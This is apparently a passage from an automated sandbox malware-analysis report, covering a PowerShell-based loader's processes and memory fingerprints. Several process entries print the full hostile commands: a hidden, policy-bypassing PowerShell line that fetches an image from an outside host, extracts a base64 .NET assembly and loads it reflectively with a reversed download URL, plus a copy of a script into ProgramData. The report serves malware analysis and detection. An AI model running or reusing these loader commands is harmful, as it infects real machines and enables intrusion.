? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Hk? ? ? ? ?awBz? ? ? ? ?C8? ? ? ? ?bgBp? ? ? ? ?G0? ? ? ? ?Z? ? ? ? ?Bh? ? ? ? ?C0? ? ? ? ?c? ? ? ? ?B3? ? ? ? ?C8? ? ? ? ?ZQBn? ? ? ? ?C4? ? ? ? ?bwBz? ? ? ? ?GE? ? ? ? ?bQ? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBz? ? ? ? ?H? ? ? ? ?? ? ? ? ?d? ? ? ? ?B0? ? ? ? ?Gg? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?DE? ? ? ? ?Jw? ? ? ? ?g? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?EM? ? ? ? ?OgBc? ? ? ? ?F? ? ? ? ?? ? ? ? ?cgBv? ? ? ? ?Gc? ? ? ? ?cgBh? ? ? ? ?G0? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQBc? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBu? ? ? ? ?GU? ? ? ? ?dQBy? ? ? ? ?G8? ? ? ? ?bQBv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?EE? ? ? ? ?Z? ? ? ? ?Bk? ? ? ? ?Ek? ? ? ? ?bgBQ? ? ? ? ?HI? ? ? ? ?bwBj? ? ? ? ?GU? ? ? ? ?cwBz? ? ? ? ?DM? ? ? ? ?Mg? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Powershell Activities

                            Show Windows behavior

                            Mutex Activities

                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            Process Token Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:3
                            Start time:05:37:01
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Mutex Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:4
                            Start time:05:37:03
                            Start date:12/08/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            Show Windows behavior

                            Registry Activities

                            Powershell Activities

                            Show Windows behavior

                            Mutex Activities

                            Show Windows behavior

                            Process Activities

                            Show Windows behavior

                            Thread Activities

                            Show Windows behavior

                            Memory Activities

                            Show Windows behavior

                            System Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            Process Token Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:5
                            Start time:05:37:06
                            Start date:12/08/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
                            Imagebase:0x7ff754f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Process Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            General

                            Target ID:6
                            Start time:05:37:06
                            Start date:12/08/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true
                            Show Windows behavior

                            File Activities

                            Show Windows behavior

                            Section Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Mutex Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Thread Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                            Show Windows behavior

                            Windows UI Activities

                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                            Disassembly

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000002.00000002.2262153688.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction ID: 8979d17b611d2f02bd41aeeb7e19fc684a639d902bce64cf38cc553155f26dc5
                            • Opcode Fuzzy Hash: 4245d3e889aec3e041d9d8f734bc47effec83d37e61caed90803d2df4b046ffc
                            • Instruction Fuzzy Hash: 7701677111CB0D4FDB44EF0CE451AA6B7E0FB95364F10056EE58AC36A5D736E882CB46

                            Executed Functions

                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b2376c3523b27b754c0817c031575b434be2e13ae2ee54868bf2e6b3965e36ae
                            • Instruction ID: d1394af1c9603a0af48046401ec93a675388b6762f86fe5f07e0f735c7fc525d
                            • Opcode Fuzzy Hash: b2376c3523b27b754c0817c031575b434be2e13ae2ee54868bf2e6b3965e36ae
                            • Instruction Fuzzy Hash: EB522732E0DA894FE39AAB6C58151B57BE1EF96660F1801BBC14DC71D3DF28AC06C395
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b903d6acf209dc488ce18fa60c24e036e196889d3fb49a6fd2d91121d3f22352
                            • Instruction ID: 0e21ea0ffadd4cb27536b4b65debc5bca958bd26a3a3c4196147de2f7092d235
                            • Opcode Fuzzy Hash: b903d6acf209dc488ce18fa60c24e036e196889d3fb49a6fd2d91121d3f22352
                            • Instruction Fuzzy Hash: 84524532E0DA8A4FE7A6AB2858546B57BE1EF56750F0801FBC10DC71D3DE28AC46C359
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed2209c34bb77e5389d6db965ca842bbd5f940f3a1cf697871ccfe30de41994a
                            • Instruction ID: 0a3ed123ca21030b99f048c92e5c2ca22a275c9b4bc0f7f88cccb1c86d00a6c6
                            • Opcode Fuzzy Hash: ed2209c34bb77e5389d6db965ca842bbd5f940f3a1cf697871ccfe30de41994a
                            • Instruction Fuzzy Hash: F8C10131E1EA8A5FE795EB2858195B5BBE1FF1A364F0800FBD14CC70D3EB18A8058359
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d851092b8668e11e73beb6c4eb6709252b1204b734fa6e18ef74c7bfdd916924
                            • Instruction ID: b9aedca2d11fdf93d5e776c42379db4fd45057ab67429b41cb2d654f51761429
                            • Opcode Fuzzy Hash: d851092b8668e11e73beb6c4eb6709252b1204b734fa6e18ef74c7bfdd916924
                            • Instruction Fuzzy Hash: D5610832E1EA8B4FF7A9B72854552B566D1EF95690F4800BBCB0DC31D3EF1CA8058349
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5797fefd730455c2f5ef59f19896b3a1ae002d0bf9a287b2e1f2bd0ca2f92442
                            • Instruction ID: 580462ccb75762fe235fcad8a6e8165ab237c891e174c1a6da16f516ef560b7a
                            • Opcode Fuzzy Hash: 5797fefd730455c2f5ef59f19896b3a1ae002d0bf9a287b2e1f2bd0ca2f92442
                            • Instruction Fuzzy Hash: 2C513632D1DB8A4FE7B5AF6848151757BE1EF66350F0901BBC64DC71D3DA28AC068386
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 29f4f24de7ba40cc755d79a820f3ce48c70aaa6d72c6141282a85eb42b705076
                            • Instruction ID: d7c05810df29972569ffdda6d8397dc138b25da71c887e4281aa1743ac9a4253
                            • Opcode Fuzzy Hash: 29f4f24de7ba40cc755d79a820f3ce48c70aaa6d72c6141282a85eb42b705076
                            • Instruction Fuzzy Hash: 66411532E1DA8A4FE7B9EF58485517576E1EF95350F0801BFCA0DC72D2DB28AC068789
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32cd2f41a3b145341fc2bd438353b4e151879d7efb13f72079bf583cbf2cd22a
                            • Instruction ID: deed896fddd923da082fa5b8768b974064e60d0702983119710195407ebc2a62
                            • Opcode Fuzzy Hash: 32cd2f41a3b145341fc2bd438353b4e151879d7efb13f72079bf583cbf2cd22a
                            • Instruction Fuzzy Hash: E341E332E1DA5A4FE7A5B72C14116B966D2EFD4690F4801BBCA0DC31D6DF18AC018389
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f20ee330e9a8bcfc4b4dc6d65b7d5853c3fe54ad7503cf5eed640a3f2da3b54
                            • Instruction ID: 5fd23f519c736000cc32b327ae77fdd0a75265221ee39f1f5936151d7acf5589
                            • Opcode Fuzzy Hash: 2f20ee330e9a8bcfc4b4dc6d65b7d5853c3fe54ad7503cf5eed640a3f2da3b54
                            • Instruction Fuzzy Hash: 6B410032E1CA4A4FF7A4EB6C449427866D1EFA4390F8801BBD61CC72D6EF29DC458365
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f5ce0202fa13a94610ec36015bada4c32e2b60e1f124e5c7f0678a4db52d8329
                            • Instruction ID: 172a5c503b7dd8ec4eef0a64307cd180ab075748b92a33acd0d9450d28771133
                            • Opcode Fuzzy Hash: f5ce0202fa13a94610ec36015bada4c32e2b60e1f124e5c7f0678a4db52d8329
                            • Instruction Fuzzy Hash: 30411332E1FA8B4FF3A9B728446527966D2EF90295F5800BBCB0DD31D2EF1CA8044309
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 891ff92243cc6e08bfea65e26b60b1f3aeb7a11f341a1bcd18a7d0ad23005f21
                            • Instruction ID: 646a0230882fbb6796a635089167996c3b5d0a9f3f81e3f3e767b28acdb11666
                            • Opcode Fuzzy Hash: 891ff92243cc6e08bfea65e26b60b1f3aeb7a11f341a1bcd18a7d0ad23005f21
                            • Instruction Fuzzy Hash: 6F41A570D1991D9FDB98EFA8D495AEDBBF1FF68301F500169E409E7291CB75A881CB00
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7b7d5fc00822eee796bfefbdd6e30877f224c0d03fa6853c0fd9413190c12b8
                            • Instruction ID: 88c22e4c453b1c0d784e68c4198d426d5e2f50fa64490ca287a4091291822b76
                            • Opcode Fuzzy Hash: e7b7d5fc00822eee796bfefbdd6e30877f224c0d03fa6853c0fd9413190c12b8
                            • Instruction Fuzzy Hash: BB11AC32E1DA1A0FF7A8B62C14552BC62C2EFD4291F040177DE0DD32E2DF08BC040289
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36a7536bc3f6a24b337ff8788298ad5e18fc3bdacebf6ff1b4c9b696a632244f
                            • Instruction ID: 4140ec80acb2016f915a643102f344a0e39584e705e8321b40278bb3f7ba7b3e
                            • Opcode Fuzzy Hash: 36a7536bc3f6a24b337ff8788298ad5e18fc3bdacebf6ff1b4c9b696a632244f
                            • Instruction Fuzzy Hash: 93119331E0DA469FE755EF58944427877E2FF1C365F5800BBC14CD71D2EA28A8458358
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 43e7822759474716500eb09300f05258689b6fe76f4e351a1aa38a7987bd0a57
                            • Instruction ID: 3159ea642d237d679b067bb3d2e0a43d3d4e86b14909e1f21efd9c3cfbd97fb6
                            • Opcode Fuzzy Hash: 43e7822759474716500eb09300f05258689b6fe76f4e351a1aa38a7987bd0a57
                            • Instruction Fuzzy Hash: 0D018633F1ED1A1FF7AAA35C14252B991D2DF94691F5801BBD60EC31C6DF1C9C045289
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: 3758ae5b02bea70f67fe94c7435bb31095d1c9a914496b4f8bfd1143afb260cc
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: EE01677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC36A5D736E881CB46
                            Memory Dump Source
                            • Source File: 00000004.00000002.2226170971.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848ff0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 99d8cd9937be2b096dc58b7d86808f265373864eb4bcca443a6216b4fe1a275f
                            • Instruction ID: 1333ded6ec329a7d1fe8ed0bcf190889afa2e8ed7df43aab24fc4c5afe99045f
                            • Opcode Fuzzy Hash: 99d8cd9937be2b096dc58b7d86808f265373864eb4bcca443a6216b4fe1a275f
                            • Instruction Fuzzy Hash: 0C01A92064E3C44FD347A33CA8186653F91AF43364F1C01FEE0C9CA5E3CA995816C356
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9670af5b2cb7c51ac81487badd89ea53f3ecb75e0b20ec82f0a58b442ee9a61e
                            • Instruction ID: 441ffda2fe7ff430f1210a7dbfaf7ef8bc055b07f477813991738fd274679c4b
                            • Opcode Fuzzy Hash: 9670af5b2cb7c51ac81487badd89ea53f3ecb75e0b20ec82f0a58b442ee9a61e
                            • Instruction Fuzzy Hash: EBF0F430E1890D8EDF90FBA8D451AACB7B1EF99341F600129D00DE3286CB39A8518B80
                            Memory Dump Source
                            • Source File: 00000004.00000002.2225424241.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_7ff848f20000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb05cda167a1da8244d183a69e4158167b230500e322d805241a8e5d68650948
                            • Instruction ID: a605d202b973c56b70ce5af698247819a466d2e36cf08b7ff3b1b369ef76f736
                            • Opcode Fuzzy Hash: eb05cda167a1da8244d183a69e4158167b230500e322d805241a8e5d68650948
                            • Instruction Fuzzy Hash: 09F0B730A05A1C8FDB94EB28C450BA9B3B2EF5A744F9045E9D04DD3292CE35ADC1CF00